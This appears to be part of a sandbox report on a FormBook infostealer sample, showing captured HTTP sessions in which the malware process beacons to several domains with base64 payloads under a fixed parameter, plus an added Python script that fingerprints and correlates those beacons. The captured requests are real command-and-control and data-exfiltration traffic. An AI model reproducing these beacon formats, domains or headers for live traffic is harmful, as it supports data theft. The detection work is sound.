                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:53.222039938 CET  571                IN         Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDMyYzFlNjMtMGYyMS00NmUwLWE2OTgtODU2MTA3MDQzZDBkIiwicGFnZV90aW1lIjoxNzMxMzk3OT


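The sessions above share one shape: a POST (or GET) to a short single-segment path such as /ym43/ or /d26j/, a single opaque base64 value under the fixed parameter name L2m0Zn (plus a short JPc parameter on the GET), Origin and Referer headers that point back at the beacon URL itself, and the same Windows NT 6.1 / Chrome 33 User-Agent on every request regardless of the sandbox's real OS. Both contacted hosts answer with a domain-parking page (parking_session cookie, window.park script), so neither is serving a live controller at capture time; FormBook configurations carry many such decoy domains alongside the real C2. The script below is an added example and not part of the Joe Sandbox report: it re-parses the requests and one response copied from the sessions above (constructed sample input, bodies as shown on the page), extracts those traits, and correlates the parameter name across hosts, which is the fingerprint of a single implant walking its domain list. The trait names and the score threshold are this example's own choices.

```python
"""Triage HTTP beacons from a sandbox capture for FormBook-style C2 traffic.

Added example, not part of the Joe Sandbox report. REQUESTS and
PARKED_RESPONSE are constructed sample input copied from the sessions above.
"""
import re
from collections import defaultdict

# The User-Agent seen on every request in this capture: a 2014-era Chrome
# build claiming Windows 7, hard-coded in the implant.
UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/33.0.1726.0 Safari/537.36")

REQUESTS = [
    # Session 6: POST to www.migraine-massages.pro
    "POST /ym43/ HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.migraine-massages.pro\r\n"
    "Origin: http://www.migraine-massages.pro\r\n"
    "Referer: http://www.migraine-massages.pro/ym43/\r\n"
    f"User-Agent: {UA}\r\n\r\n"
    "L2m0Zn=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8Wqa"
    "NVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyX"
    "GHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrOTjAwv4CGtBWwFFcbaCzfJOEnnJyZtQD0=",
    # Session 8: GET to the same host with two query parameters
    "GET /ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7Js"
    "YsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQ"
    "dBBkPWTStX HTTP/1.1\r\n"
    "Host: www.migraine-massages.pro\r\n"
    f"User-Agent: {UA}\r\n\r\n",
    # Session 9: POST to a second domain, same parameter name
    "POST /d26j/ HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.vnxoso88.art\r\n"
    "Origin: http://www.vnxoso88.art\r\n"
    "Referer: http://www.vnxoso88.art/d26j/\r\n"
    f"User-Agent: {UA}\r\n\r\n"
    "L2m0Zn=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZ"
    "hYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPs"
    "RtObRaS9rBH6U7wlhETtWqL2+YbWkqrTZwNaLIpMK1s8yWeo1s9mHLO6Q==",
]

# Response from session 9, headers trimmed and body shortened ("..." marks
# the cut); the parking markers are what matters here.
PARKED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "content-type: text/html; charset=utf-8\r\n"
    "set-cookie: parking_session=032c1e63-0f21-46e0-a698-856107043d0d; "
    "expires=Tue, 12 Nov 2024 08:07:53 GMT; path=/\r\n\r\n"
    '<!doctype html><html><body><div id="target" style="opacity: 0"></div>'
    '<script>window.park = "eyJ1dWlk..."</script></body></html>'
)

B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, host, path, headers and the
    form/query parameters. Values are deliberately not URL-decoded: the '+'
    and '/' in the payload are base64 alphabet, not form encoding."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = {}
    for pair in filter(None, (query if method == "GET" else body).split("&")):
        name, _, value = pair.partition("=")
        params[name] = value
    return {"method": method, "host": headers.get("host", ""),
            "path": path, "headers": headers, "params": params}


def beacon_indicators(req):
    """Return the FormBook-style traits this request shows (names are this
    example's own labels)."""
    hits = []
    h = req["headers"]
    # Short, single-segment path such as /ym43/ or /d26j/.
    if re.fullmatch(r"/[a-z0-9]{2,6}/", req["path"]):
        hits.append("short-random-path")
    # One opaque base64 blob under a fixed parameter name: no real form fields.
    values = list(req["params"].values())
    if values and B64.fullmatch(values[0]) and len(values[0]) % 4 == 0:
        hits.append("base64-payload-param")
    # Origin/Referer synthesised to point at the beacon URL itself; a browser
    # form post would be referred from a page on that site, not the endpoint.
    if (req["method"] == "POST"
            and h.get("origin") == f"http://{req['host']}"
            and h.get("referer") == f"http://{req['host']}{req['path']}"):
        hits.append("self-referencing-origin")
    if h.get("user-agent") == UA:
        hits.append("hardcoded-legacy-ua")
    return hits


def correlate(raw_requests, min_hits=3):
    """Map each parameter name to the hosts it was sent to, counting only
    requests that show at least min_hits traits. One name reused across
    unrelated domains is a single implant walking its domain list."""
    by_param = defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        if len(beacon_indicators(req)) >= min_hits:
            for name in req["params"]:
                by_param[name].add(req["host"])
    return {name: sorted(hosts) for name, hosts in by_param.items()}


def is_parked_response(raw):
    """True when the contacted host answered with a domain-parking page, so
    it is not serving a live controller at capture time."""
    head, _, body = raw.partition("\r\n\r\n")
    return "parking_session=" in head.lower() or "window.park" in body


if __name__ == "__main__":
    for raw in REQUESTS:
        req = parse_request(raw)
        print(req["method"], req["host"], req["path"], beacon_indicators(req))
    print("parameter names by host:", correlate(REQUESTS))
    print("decoy (parked) response:", is_parked_response(PARKED_RESPONSE))
```

Run as-is it lists four traits for each POST and three for the GET, reports L2m0Zn against both hosts, and classifies the session 9 reply as a parked decoy. In a real investigation, feed it every HTTP request from the capture; the hosts under the shared parameter name that do not return a parking page are the ones worth blocking and pivoting on first.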
                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          10          192.168.2.4  49837        199.59.243.227  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:52:55.131661892 CET  651                OUT        POST /d26j/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          Origin: http://www.vnxoso88.art
                                                                          Referer: http://www.vnxoso88.art/d26j/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 79 74 31 79 6c 4a 72 45 32 48 68 63 69 43 36 47 6b 74 6b 54 64 6d 73 48 7a 4b 7a 4a 44 44 55 79 49 3d
                                                                          Data Ascii: L2m0Zn=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uyyt1ylJrE2HhciC6GktkTdmsHzKzJDDUyI=
                                                                          Nov 12, 2024 08:52:55.756385088 CET  1236               IN         HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:54 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1118
                                                                          x-request-id: d55c7a5d-ef36-4222-be6d-21dce942cca2
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                          set-cookie: parking_session=d55c7a5d-ef36-4222-be6d-21dce942cca2; expires=Tue, 12 Nov 2024 08:07:55 GMT; path=/
                                                                          connection: close
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:55.756422997 CET | 571 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDU1YzdhNWQtZWYzNi00MjIyLWJlNmQtMjFkY2U5NDJjY2EyIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          11 | 192.168.2.4 | 49852 | 199.59.243.227 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Nov 12, 2024 08:52:57.679811954 CET | 10733 | OUT | POST /d26j/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          Origin: http://www.vnxoso88.art
                                                                          Referer: http://www.vnxoso88.art/d26j/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:52:58.297275066 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:57 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1118
                                                                          x-request-id: 290819f2-0e0f-46e6-87db-617d26f0bb5c
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                          set-cookie: parking_session=290819f2-0e0f-46e6-87db-617d26f0bb5c; expires=Tue, 12 Nov 2024 08:07:58 GMT; path=/
                                                                          connection: close
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:58.297287941 CET | 571 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjkwODE5ZjItMGUwZi00NmU2LTg3ZGItNjE3ZDI2ZjBiYjVjIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          12 | 192.168.2.4 | 49868 | 199.59.243.227 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Nov 12, 2024 08:53:00.223387957 CET | 372 | OUT | GET /d26j/?L2m0Zn=yTdTvK6nwd7fLzOcZ1KS4TBFSWEE7xEBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3l8PVEl0DEVtj8ozSBQBBAVHa7hfB74pOyU=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:00.876884937 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:59 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1470
                                                                          x-request-id: a14d32a3-a253-4d42-bedc-0fd7e5fd5114
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Loc/T6r1UcTGwyVOCrvN0Q86hIXdcaV8ZeB2Nyf0aiJZy4LNkQxJcPo/herPlCc4LR3m6/pcFkYXPG0ZXYGBfw==
                                                                          set-cookie: parking_session=a14d32a3-a253-4d42-bedc-0fd7e5fd5114; expires=Tue, 12 Nov 2024 08:08:00 GMT; path=/
                                                                          connection: close
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Loc/T6r1UcTGwyVOCrvN0Q86hIXdcaV8ZeB2Nyf0aiJZy4LNkQxJcPo/herPlCc4LR3m6/pcFkYXPG0ZXYGBfw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:53:00.876898050 CET | 923 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE0ZDMyYTMtYTI1My00ZDQyLWJlZGMtMGZkN2U1ZmQ1MTE0IiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          13 | 192.168.2.4 | 49897 | 209.74.64.58 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Nov 12, 2024 08:53:05.922686100 CET | 634 | OUT | POST /afcr/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          Origin: http://www.pluribiz.life
                                                                          Referer: http://www.pluribiz.life/afcr/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fw+JnfjsmI+BG7emqOmOYiTtSyWKQ+5Ulw==
                                                                          Nov 12, 2024 08:53:06.577081919 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:06 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          14 | 192.168.2.4 | 49912 | 209.74.64.58 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Nov 12, 2024 08:53:08.462522030 CET | 654 | OUT | POST /afcr/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          Origin: http://www.pluribiz.life
                                                                          Referer: http://www.pluribiz.life/afcr/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS7flyCKnz6Ba3R0WaOGvLiKpyvOKiYI30nRViiNqnIrfIRPh7CkjK+U/7bGAlwFRKux46x66yTNs8nTS4nJ0ua7RyV0c1+dcI3L7EXg+4ZdNzt4nGXHydnBxWVTJo8PTprGLOdT87/HZKi3eP1f+d9Ed+8n+Ut9q0ZpSbHHdSJ5h0p0=
                                                                          Nov 12, 2024 08:53:09.133166075 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:09 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          15 | 192.168.2.4 | 49927 | 209.74.64.58 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Nov 12, 2024 08:53:11.014210939 CET | 10736 | OUT | POST /afcr/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          Origin: http://www.pluribiz.life
                                                                          Referer: http://www.pluribiz.life/afcr/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:11.954678059 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:11 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          16 | 192.168.2.4 | 49943 | 209.74.64.58 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Nov 12, 2024 08:53:13.557502031 CET | 373 | OUT | GET /afcr/?L2m0Zn=pxUnB3/JQIgHT0Xo3IWq6WCCUHVXBaIMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8ABar8QBPLOAn7b24mX56Fs9L7gSNzzZg1Hk=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.pluribiz.life
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:53:14.226073980 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:53:14 GMT
                                                                          Server: Apache
                                                                          Content-Length: 389
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          17          192.168.2.4  49979        47.242.89.146   80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:53:19.608899117 CET  625                OUT        POST /1iqa/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.kdtzhb.top
                                                                          Origin: http://www.kdtzhb.top
                                                                          Referer: http://www.kdtzhb.top/1iqa/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcY+eFDnPMfGW0kSkyius4YTZb4izQ/bx8EA==
